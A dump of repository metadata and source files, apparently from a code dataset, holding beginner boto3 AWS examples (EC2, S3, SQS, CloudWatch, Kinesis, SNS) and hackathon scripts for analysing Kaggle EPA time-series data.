plt.subplots()\nax1.stem(date_eq_recent, mag_eq_recent, 'r', markerfmt='o')\nax1.set_xlabel('Year')\nax1.set_ylabel('Earthquake - magnitude')\n\nplt.show()\nplot_recent_2 = 'Earthquake_latest.png'\n\nplt.savefig('%s/%s'%(dir_out, plot_recent_2))\n#==============================================================================\nfig, ax1 = plt.subplots()\n\n#ax1.stem(date_eq_all, mag_eq_all, 'r', markerfmt='o')\nplt.hist(date_eq_recent, bins=51, color='orange')\nax1.set_xlabel('Year')\nax1.set_ylabel('Frequency')\n\nplt.show()\nplot_all = 'Earthquake_all_hist.png'\n\nplt.savefig('%s/%s'%(dir_out, plot_all))\n"
}
] | 3 |
smadhu1224/aws-python | https://github.com/smadhu1224/aws-python | f0e2e572cd7c2bbc8acc2e3fa10b05f762539de3 | 08f2ae0c77b0155a4e74e2a319dac029ee670305 | d1555ab9ed2f296e50b787d05b663dc4e5d463a0 | refs/heads/master | 2020-07-29T10:38:09.829173 | 2019-04-17T08:57:51 | 2019-04-17T08:57:51 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6409638524055481,
"alphanum_fraction": 0.6746987700462341,
"avg_line_length": 22,
"blob_id": "579736ea0e9bca0725c63ce61b9ee8335ac37c0c",
"content_id": "857ec3a50611597a04d877d0cf99f007e14e0657",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 415,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 18,
"path": "/terminateinstance.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\nclient = boto3.client('ec2')\nres = client.describe_instances()\n\ninstanceList = res['Reservations']\n\ni = 0\n\nwhile i < len(instanceList):\n print(instanceList[i]['Instances'][0]['State']['Name'])\n i = i+1\nid1 = res['Reservations'][0]['Instances'][0]['InstanceId']\nec2 = boto3.resource('ec2')\ninstance = ec2.Instance(id1)\nstate = instance.state['Name']\nif state=='running':\n instance.terminate()\n\n"
},
{
"alpha_fraction": 0.6330274939537048,
"alphanum_fraction": 0.7247706651687622,
"avg_line_length": 35.66666793823242,
"blob_id": "667b894a68ae4a56c66a0a545c3f20b4f0fbe106",
"content_id": "302801159b052a084b748962dd60fac8cb068ca7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 109,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 3,
"path": "/s3downloadfile.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\ns3 = boto3.resource('s3')\nmyfile = s3.Object('suresh0302','s3.py').download_file('mycontent.py')"
},
{
"alpha_fraction": 0.5031185150146484,
"alphanum_fraction": 0.5821205973625183,
"avg_line_length": 21.952381134033203,
"blob_id": "d1b704c2964a6fb69e077cf4c7801026d7b030fc",
"content_id": "da60c4fac4185261d3a2962b39be580cae23cea3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 21,
"path": "/metricstatistics.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nfrom datetime import datetime\nclient = boto3.client('cloudwatch')\n\nresponse = client.get_metric_statistics(\\\n Namespace='AWS/EC2',\\\n MetricName='CPUUtilization',\\\n Dimensions=[\\\n {\\\n 'Name': 'InstanceId',\\\n 'Value': 'i-4e539888'\\\n },\\\n ],\\\n StartTime=datetime(2016,5,20,00,00,00),\\\n EndTime=datetime(2016,5,20,8,30,00),\\\n Period=600,\\\n Statistics=[\\\n 'Average',\\\n ]\\\n)\nprint(response['Datapoints'])"
},
{
"alpha_fraction": 0.650943398475647,
"alphanum_fraction": 0.6886792182922363,
"avg_line_length": 14.285714149475098,
"blob_id": "3e24885175d64c88e316149474a2a93256709444",
"content_id": "c20aa76b27fb0d772cf574f475db7398cf0dab54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 7,
"path": "/s3delete.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.resource('s3')\n\nfor key in bucket.objects.all():\n key.delete()\nbucket.delete()"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7293233275413513,
"avg_line_length": 18.14285659790039,
"blob_id": "e4620758aa0fb44fa9a99754797c374556c456d5",
"content_id": "e3fa24c770fabdc2d930ef8f2d078f07970fd698",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 7,
"path": "/deleteq.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\n# Get the service resource\nsqs = boto3.resource('sqs')\nqueue = sqs.get_queue_by_name(QueueName='test') \n\nqueue.delete()"
},
{
"alpha_fraction": 0.6757532358169556,
"alphanum_fraction": 0.6843615770339966,
"avg_line_length": 33.900001525878906,
"blob_id": "86438f5626c1f8a86c6ee12329bfcf85f24c5a48",
"content_id": "d12c5537f94519f040a9fb50ec4f0d9b08eb6209",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 697,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 20,
"path": "/readingmsgq.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\n# Get the service resource\nsqs = boto3.resource('sqs')\nqueue = sqs.get_queue_by_name(QueueName='test') \n\nmsg = queue.receive_messages(MessageAttributeNames=['Author'],MaxNumberOfMessages=4)\nfor message in msg:\n # Get the custom author message attribute if it was set\n author_text = ''\n if message.message_attributes is not None:\n author_name = message.message_attributes.get('Author').get('StringValue')\n if author_name:\n author_text = ' ({0})'.format(author_name)\n\n # Print out the body and author (if set)\n print('Hello, {0}!{1}'.format(message.body, author_text))\n\n # Let the queue know that the message is processed\n message.delete()"
},
{
"alpha_fraction": 0.8178808093070984,
"alphanum_fraction": 0.8178808093070984,
"avg_line_length": 49.16666793823242,
"blob_id": "7c6e0b538c8d855948e6774058d3352408071f34",
"content_id": "2a0edc3824e81e3b18b2fd374a84cd3d2c20ff6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 6,
"path": "/Readme.txt",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "This directory will hold AWS Examples based on Python\n\nTo run these examples you must have an AWS account \nYou must have the Boto Python Library installed\nYou must run aws configure first to ensure your AWS credentials are saved on your system\nThese will be available under the .awscofigure directory \n"
},
{
"alpha_fraction": 0.6601941585540771,
"alphanum_fraction": 0.708737850189209,
"avg_line_length": 33.66666793823242,
"blob_id": "aaa72298ee17af153b1a6b071e0fb54735a86fc3",
"content_id": "aaff81c5edc4e34e78e160cb3439c09971556fee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 3,
"path": "/s3upload1.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\ns3 = boto3.resource('s3')\ns3.Object('mybucket', 'hello.txt').upload_file('/tmp/hello.txt')"
},
{
"alpha_fraction": 0.6705202460289001,
"alphanum_fraction": 0.6878612637519836,
"avg_line_length": 20.58333396911621,
"blob_id": "262da378d10d0c8a3b42f1d7ec4ae24843d9320e",
"content_id": "fa6ad938453b0e83e9987df9f019988aef0abe37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 519,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 24,
"path": "/queueurl.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nsqs = boto3.resource('sqs')\n\nmyqueue = sqs.get_queue_by_name(QueueName='test')\nprint(myqueue.url)\n\nmyqueue = sqs.get_queue_by_name(QueueName='test')\n\nmessage = myqueue.Messagereceive_messages()\n\nprint(len(message))\n\nif 'Records' in message[0].body:\n\tprint('Correct Message')\nelse:\n\tprint('Test Message')\n\t\ndata = json.loads(message[0].body)\n\nif 'Records' in message[0].body:\n\tprint(data['Records'][0]['s3']['object']['key'])\n\tprint(data['Records'][0]['s3']['bucket']['name'])\nelse:\n\tprint('Test Message')\n "
},
{
"alpha_fraction": 0.48516950011253357,
"alphanum_fraction": 0.4936440587043762,
"avg_line_length": 20.5,
"blob_id": "b9dcdb27c6b3fa7d17426985f67c5c9834b80ce7",
"content_id": "b9c2cd6afb1c32afceadc38028a444e8343c11ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 472,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 22,
"path": "/sendmsgtoq3.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\n# Get the service resource\nsqs = boto3.resource('sqs')\nqueue = sqs.get_queue_by_name(QueueName='test') \n\nresponse = queue.send_messages(Entries=[\n {\n 'Id': '1',\n 'MessageBody': 'Hello World Here I come'\n },\n {\n 'Id': '2',\n 'MessageBody': 'MyQueueMessage',\n 'MessageAttributes': {\n 'Author': {\n 'StringValue': 'Suresh',\n 'DataType': 'String'\n }\n }\n }\n])"
},
{
"alpha_fraction": 0.6698841452598572,
"alphanum_fraction": 0.6988416910171509,
"avg_line_length": 24.950000762939453,
"blob_id": "525d0e60c6c7e2146f54f2f0e3aaf3891382eca4",
"content_id": "c1c63e271a14dbe79583a2bae58e23230f30fdb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 20,
"path": "/s3example.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\ns3 = boto3.resource('s3')\nbucket = s3.buckets.all()\nfor b in s3.buckets.all():\n\tprint(b.name)\nfor b in s3.buckets.all():\n\tprint(b.name)\n\tprint(b.creation_date)\ncli = boto3.client('s3')\nfor b in s3.buckets.all():\n\tbucketName = b.name\n\tresponse = cli.list_objects(Bucket=bucketName)\nkeyName1 = response['Contents'][0]['Key']\ncli.delete_object(Bucket=bucketName,Key=keyName1)\nKeyObjects = response['Contents']\ni = 0\nwhile i < len(KeyObjects):\n\tfor e in KeyObjects[i]:\n\t\tprint(e,\":\",KeyObjects[i][e])\n\ti = i+1"
},
{
"alpha_fraction": 0.48847925662994385,
"alphanum_fraction": 0.5299538969993591,
"avg_line_length": 23.22222137451172,
"blob_id": "42bb6d4d5f9fa2559f4c9506dfe489fdd0df9f09",
"content_id": "74727cc75a87599ca97f844a1d291734729e20b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 9,
"path": "/runinstance.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\nclient = boto3.client('ec2')\n\nreservation = client.run_instances(\n ImageId='ami-9ff7e8af',\n InstanceType='t2.micro',\n MinCount=1, MaxCount=1,\n )"
},
{
"alpha_fraction": 0.5864958167076111,
"alphanum_fraction": 0.5943814516067505,
"avg_line_length": 30.238094329833984,
"blob_id": "e55f52a17afbbe5c350c31816fa0ce861520c91e",
"content_id": "73a0dc80eed91c1df5cbed623050000c65a78775",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2029,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 63,
"path": "/kinesisOps.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\r\nimport json\r\nimport time\r\n\r\n#kinesis_stream = boto3.client('kinesis')\r\n\r\n#response = kinesis_stream.create_stream(\r\n#\t StreamName = 'CloudSiksha',\r\n#\t ShardCount = 1)\r\n\r\ndef put_stream(stream_name, my_data, partition_key):\r\n\tkinesis_client = boto3.client('kinesis')\r\n\r\n\tresponse = kinesis_client.put_record(\r\n\t\t StreamName = stream_name,\r\n\t\t Data = my_data,\r\n\t\t PartitionKey = partition_key)\r\n\treturn response\r\n\r\nmy_streamname = 'CloudSiksha'\r\nmy_partition_key = 'aa'\r\n#i = 0\r\n#while i < 50:\r\n# data = \"Hello\"+str(i)\r\n# my_struct = {\"Key\":data}\r\n# my_input_data = json.dumps(my_struct)\r\n# i = i+1\r\n\r\n # response = put_stream(my_streamname,my_input_data,my_partition_key)\r\n # print(response)\r\n\r\ndef get_stream(my_stream_name):\r\n\r\n\tkinesis_client = boto3.client('kinesis')\r\n\r\n\tresponse = kinesis_client.describe_stream(StreamName = my_stream_name)\r\n\tprint(response)\r\n\r\n\tmy_shard_id = response['StreamDescription']['Shards'][0]['ShardId']\r\n\tstarting_sequence_number = response['StreamDescription']['Shards'][0]['SequenceNumberRange']['StartingSequenceNumber']\r\n\r\n\tshard_iterator = kinesis_client.get_shard_iterator(StreamName=my_stream_name,\r\n ShardId=my_shard_id,\r\n ShardIteratorType='TRIM_HORIZON')\r\n #StartingSequenceNumber = starting_sequence_number)\r\n\r\n\tmy_shard_iterator = shard_iterator['ShardIterator']\r\n\r\n\tread_response = kinesis_client.get_records(ShardIterator=my_shard_iterator,\r\n Limit=10)\r\n\r\n\twhile 'NextShardIterator' in read_response:\r\n\t\tread_response = kinesis_client.get_records(ShardIterator=read_response['NextShardIterator'],\r\n Limit=10)\r\n\r\n\t\tprint(read_response['Records'])\r\n\t\tif not read_response['Records']:\r\n\t\t\tbreak\r\n\r\n\t\ttime.sleep(5)\r\n\r\n\r\nget_stream(my_streamname)"
},
{
"alpha_fraction": 0.5493197441101074,
"alphanum_fraction": 0.5935373902320862,
"avg_line_length": 22.559999465942383,
"blob_id": "5e626c03a15a87c44f10013198e0622e2c1e21a1",
"content_id": "42f9589afe41d1d527a364e3cc3d66e248ebe625",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 588,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 25,
"path": "/aetalarm.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nclient = boto3.client('cloudwatch')\n\nresponse = client.put_metric_alarm(\\\n AlarmName='LowCPU',\\\n AlarmDescription='Low CPU Alarm',\\\n ActionsEnabled=True,\\\n AlarmActions=[\\\n 'arn:aws:sns:us-west-2:033578524086:CPULow',\\\n ],\\\n MetricName='CPUUtilization',\\\n Namespace='AWS/EC2',\\\n Statistic='Average',\\\n Dimensions=[\\\n {\\\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n],\\\n Period=300,\\\n Unit='Percent',\\\n EvaluationPeriods=1,\\\n Threshold=70,\\\n ComparisonOperator='LessThanThreshold'\\\n)"
},
{
"alpha_fraction": 0.6043956279754639,
"alphanum_fraction": 0.7252747416496277,
"avg_line_length": 14.333333015441895,
"blob_id": "ba47a1d687a630d3e6af1695ad21ea952550e474",
"content_id": "bb5c452afaa227b4b3289f38883807a46d2a33c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/s3bucketcreate.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.resource('s3')\nbucket = s3.Bucket('suresh030201')\n\nbucket.create()"
},
{
"alpha_fraction": 0.5972994565963745,
"alphanum_fraction": 0.6282764077186584,
"avg_line_length": 19.655736923217773,
"blob_id": "95e2ce07fe0ed1ef59ffe1c806f2b10da946b789",
"content_id": "9fbc03fb10980301884595c180e2cebd5edb3a84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1259,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 61,
"path": "/e2instancewithpasswd.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto\nconn = EC2Connection()\ngroup_name = 'CloudSiksha'\ndescription = 'CloudSiksha: Test Security Group.'\n \ngroup = conn.create_security_group(\n group_name, description\n)\n \ngroup.authorize('tcp', 8888,8888, '<a href=\"http://0.0.0.0/0\">0.0.0.0/0</a>')\nimport random\nfrom string import ascii_lowercase as letters\n \n# Create the random data in the right format\ndata = random.choice(('UK', 'US'))\nfor a in range(4):\n data += '|'\n for b in range(8):\n data += random.choice(letters)\nimport hashlib\n \n# Your chosen password goes here\npassword = 'password'\n \nh = hashlib.new('sha1')\nsalt = ('%0' + str(12) + 'x') % random.getrandbits(48)\nh.update(password + salt)\n \npassword = ':'.join(('sha1', salt, h.hexdigest()))\n\ndata += '|' + password\n\n# NotebookCloud AMI\nAMI = 'ami-affe51c6'\n \nconn.run_instances(\n AMI,\n instance_type = 't1.micro',\n security_groups = ['python_central'],\n user_data = data,\n max_count = 1\n)\n\nimport time\n \nwhile True:\n inst = [\n i for r in conn.get_all_instances()\n for i in r.instances\n ][0]\n \ndns = inst.__dict__['public_dns_name']\n \nif dns:\n # We want this instance id for later\n instance_id = i.__dict__['id']\n break\n \ntime.sleep(5)\n\nprint('https://{}:8888'.format(dns))"
},
{
"alpha_fraction": 0.5052316784858704,
"alphanum_fraction": 0.5874439477920532,
"avg_line_length": 21.33333396911621,
"blob_id": "04b44ce49ac19cddda30c2cf4bab9cf8a3a47fa9",
"content_id": "7bbd989615408b948bf324b358c479bd67311843",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 30,
"path": "/snspolicy.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nclient = boto3.client('sns')\nsns = boto3.resource('sns')\ntopic = sns.Topic(\"arn:aws:sns:us-west-2:033578524086:NewTopic\")\n\nresponse = client.set_topic_attributes(\n\tTopicArn=\"arn:aws:sns:us-west-2:033578524086:NewTopic\",\n\tAttributeName='Policy',\n\tAttributeValue='{\\\n \"Version\": \"2008-10-17\",\\\n \"Id\": \"example-ID\",\\\n \"Statement\": [\\\n {\\\n \"Sid\": \"example-statement-ID\",\\\n \"Effect\": \"Allow\",\\\n \"Principal\": {\\\n \"AWS\":\"*\"\\\n },\\\n \"Action\": [\\\n \"SNS:Publish\"\\\n ],\\\n \"Resource\": \"arn:aws:sns:us-west-2:033578524086:NewTopic\",\\\n \"Condition\": {\\\n \"ArnLike\": {\\\n \"aws:SourceArn\": \"arn:aws:s3:*:*:suresh0302\"\\\n }\\\n }\\\n }\\\n ]\\\n}')"
},
{
"alpha_fraction": 0.5436893105506897,
"alphanum_fraction": 0.6504854559898376,
"avg_line_length": 19.600000381469727,
"blob_id": "64918077486d6b8257946128cbc24a62179cb817",
"content_id": "c9fc2411e30a2ff6ec5d9eb067a4064f98a0823f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 5,
"path": "/s3upload.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.resource('s3')\n\ns3.Object('suresh0302', 's3.py').put(Body=open('s3.py','rb'))\n"
},
{
"alpha_fraction": 0.6265060305595398,
"alphanum_fraction": 0.6867470145225525,
"avg_line_length": 15.399999618530273,
"blob_id": "6107d2a4ad1c934ae775c126aa8a2721f2927d68",
"content_id": "5a362cef10d29e1f78a8c05496d46813ccf47656",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 83,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 5,
"path": "/describeinstances.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nec2 = boto3.resource('ec2')\n\nfor e in ec2.instances.all():\n\tprint(e)\n\n"
},
{
"alpha_fraction": 0.7124394178390503,
"alphanum_fraction": 0.7205169796943665,
"avg_line_length": 31.63157844543457,
"blob_id": "3b24eca2cc924d1b05a426d8d75549937bf7e3bc",
"content_id": "f1c6cc245c7b4c822e1a9499410b4180d2811a3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 19,
"path": "/readingmsgq2.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\n# Get the service resource\nsqs = boto3.resource('sqs')\nqueue = sqs.get_queue_by_name(QueueName='test') \n\nmessage = queue.receive_messages(MessageAttributeNames=['Author'])\n# Get the custom author message attribute if it was set\nauthor_text = ''\nif message.message_attributes is not None:\n author_name = message.message_attributes.get('Author').get('StringValue')\nif author_name:\n author_text = ' ({0})'.format(author_name)\n\n # Print out the body and author (if set)\nprint('Hello, {0}!{1}'.format(message.body, author_text))\n\n # Let the queue know that the message is processed\nmessage.delete()"
},
{
"alpha_fraction": 0.6136363744735718,
"alphanum_fraction": 0.6515151262283325,
"avg_line_length": 18,
"blob_id": "c3126d2b0a12746c50c834f337e288e2c5ba95bf",
"content_id": "c3792d0709451dcedf3db436a61cae93937debce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 7,
"path": "/s3print.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.resource('s3')\n\nfor bucket in s3.buckets.all():\n for obj in bucket.objects.all():\n print(obj.key)"
},
{
"alpha_fraction": 0.28371089696884155,
"alphanum_fraction": 0.3360302150249481,
"avg_line_length": 25.884057998657227,
"blob_id": "0e4dffd09c7a352ef54bcce1d01687bf3d2c8c48",
"content_id": "67e771cdf5639c5f9432f05a09a21bb2072d4bf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1854,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 69,
"path": "/putmetric.py",
"repo_name": "smadhu1224/aws-python",
"src_encoding": "UTF-8",
"text": "import boto3\nfrom datetime import datetime\nclient = boto3.client('cloudwatch')\n\nresponse = client.put_metric_data(\\\n Namespace='Mem',\\\n MetricData=[\\\n {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,00,00),\\\n 'Value': 60,\\\n 'Unit': 'Percent'\\\n },\\\n\t {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,10,00),\\\n 'Value': 70,\\\n 'Unit': 'Percent'\\\n },\\\n\t {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,20,00),\\\n 'Value': 40,\\\n 'Unit': 'Percent'\\\n },\\\n\t {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,30,00),\\\n 'Value': 50,\\\n 'Unit': 'Percent'\\\n },\\\n\t {\\\n 'MetricName': 'Memory',\\\n 'Dimensions': [\\\n {\n 'Name': 'InstanceId',\\\n 'Value': 'i-5c2bca85'\\\n },\\\n ],\\\n 'Timestamp': datetime(2016,5,20,00,40,00),\\\n 'Value': 70,\\\n 'Unit': 'Percent'\\\n },\\\n ]\\\n)\\"
}
] | 22 |
jseabold/hackathon | https://github.com/jseabold/hackathon | db754660ea282a1f196704df9ac467992e70ad2f | 4dc65e31be91d44b2cd59e0172debc188c5fbf3e | d26a89977aaa934556d7f6e3444b80e58b49269a | refs/heads/master | 2016-08-06T07:09:27.469388 | 2012-05-14T21:45:27 | 2012-05-14T21:45:27 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6165643930435181,
"alphanum_fraction": 0.6349693536758423,
"avg_line_length": 20.600000381469727,
"blob_id": "11dd0d30e128aa0d72d1e899f03caed91bab346d",
"content_id": "3664124df23793135d518e595e8839122f0c52b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 15,
"path": "/getdata.py",
"repo_name": "jseabold/hackathon",
"src_encoding": "UTF-8",
"text": "from urllib2 import urlopen\nimport os\nimport zipfile\n\nurl = \"http://eagle1.american.edu/~js2796a/kaggle_epa_data.tar.gz\"\nfname = 'kaggle_epa_data.tar.gz'\n\nf_data = urlopen(url)\n\nwith open(fname, 'w') as fout:\n while True:\n packet = f_data.read()\n if not packet:\n break\n fout.write(packet)\n\n\n"
},
{
"alpha_fraction": 0.6843052506446838,
"alphanum_fraction": 0.6875450015068054,
"avg_line_length": 30.90804672241211,
"blob_id": "5f46b4e23936d6c94355023db559996178252580",
"content_id": "a351450e3834c004a706080a4d96d85851d9ae4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2778,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 87,
"path": "/diagnostics.py",
"repo_name": "jseabold/hackathon",
"src_encoding": "UTF-8",
"text": "\"\"\"\nLet's have a look at the data. We want to plot the targets unconditionally\nto get an idea of what the Series look like.\n\"\"\"\nimport numpy as np\nimport pandas\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\n\ntrain = pandas.read_csv('data/TrainingData.csv')\n\n##############################################################\n### Just some messing around and getting a sense of things ###\n\n#Why did I think looking at the range of temperatures would be interesting?\n#temp_diff = train.filter(regex='Ambient\\.Max.').values - \\\n # train.filter(regex='Ambient\\.Min.').values\n\n#temp_diff = pandas.DataFrame(temp_diff, columns=train.filter(regex='Ambient\\.Max').columns)\n#temp_diff = temp_diff.join(train[['chunkID','position_within_chunk',\n# 'month_most_common', 'hour']])\n\n#temp_groups = temp_diff.groupby('month_most_common')\n# let's aggregate them first and see what the in month variances are\ntemp = train.filter(regex='Ambient\\.Max.').join(train['month_most_common'])\ntemp_groups = temp.groupby('month_most_common')\n# chicago's not that cold...\ntemp_groups.aggregate(np.mean)\n# probably should do t-tests, but seriously, they're not that different\n# variance across sites in a given month\ntemp_groups.aggregate(np.mean).var(1)\n\n\n\n##### Now let's look at the endogenous variable #####\n\ntargets = train.filter(regex='^target')\n\n# targets are arranged in chunks so let's take one target at a time\n# and look at the chunks as different series if it's not too noisy\n\n#for target in targets:\n# target\n\n\n# try it out here\ntarget = targets['target_1_57']\n\n# identifying info back in\ntarget.name = 'target'\ntarget = train[['chunkID', 'position_within_chunk']].join(target)\n\ngrp_target = target.groupby('chunkID')\n\n# do lots and lots of plots to see what this data looks like?\n#for i, grp in grp_target:\n# if not np.all(grp.target.isnull()):\n# grp.target.plot()\n# plt.show()\n\n# grab one and see what the statistics are like\ngrp = grp_target.get_group(1)\n# MA(q) has negligible ACF after qth term\nplt.bar(np.arange(41), sm.tsa.acf(grp.target.fillna().values))\n# AR(p) has negligible PACF after pth term\nplt.bar(np.arange(41), sm.tsa.pacf(grp.target.fillna()))\n\n# unit root? ... maybe\nsm.tsa.stattools.adfuller(grp.target.fillna().values)\n\n# in first difference? ... not a chance\nsm.tsa.stattools.adfuller(grp.target.fillna().diff().dropna().values)\n\nkde = sm.nonparametric.KDE(grp.target.fillna())\nkde.fit()\nplt.plot(kde.support, kde.density)\n\n# looks log-normal\n# so log it, they are concentrations...\nkde = sm.nonparametric.KDE(np.log(grp.target.fillna()))\nkde.fit()\nplt.plot(kde.support, kde.density)\n\n# now it looks bi-modal, might be bw issue\n\nplt.plot(np.log(grp.target.fillna()))\nplt.show()\n\n\n"
},
{
"alpha_fraction": 0.6523216366767883,
"alphanum_fraction": 0.6613816618919373,
"avg_line_length": 27.45161247253418,
"blob_id": "5c0c1ba6201c9ba6bb7588dfa289becfcaef7ac2",
"content_id": "d90ed068e116bb3b9abdb5261909ed0209c8c338",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 883,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 31,
"path": "/arima.py",
"repo_name": "jseabold/hackathon",
"src_encoding": "UTF-8",
"text": "#NOTE: the doMC and foreach in R just parallelize the for loops\n# we could use IPython, we could use multicore, we could use joblib...\n\nimport pandas\nimport statmodels.api as sm\n\ntrain = pandas.read_csv('data/TrainingData.csv')\nsubmit = pandas.read_csv('data/SubmissionZerosExceptNAs.csv')\n\nmedians = train.median()\nmins = train.min()\nmaxes <- train.max()\n\ndef prediction_old(data, varname):\n #fallback = np.ones(72.) * medians[varname]\n # have some creative fallback position\n if data.count(numeric_only=True): < 48:\n return fallback\n\n # this won't set values\n data.ix[data <= 0] = data.ix[data > 0]\n try:\n target = log(data) # log(na.trim(data, 'left'))\n except, err:\n return fallback\n\ndef model(data, varname):\n \"\"\"\n For each target, do prediction with ARMAX model.\n \"\"\"\n arma = sm.tsa.ARMA(data).fit(order=(1,1), trend='c')\n\n"
}
] | 3 |
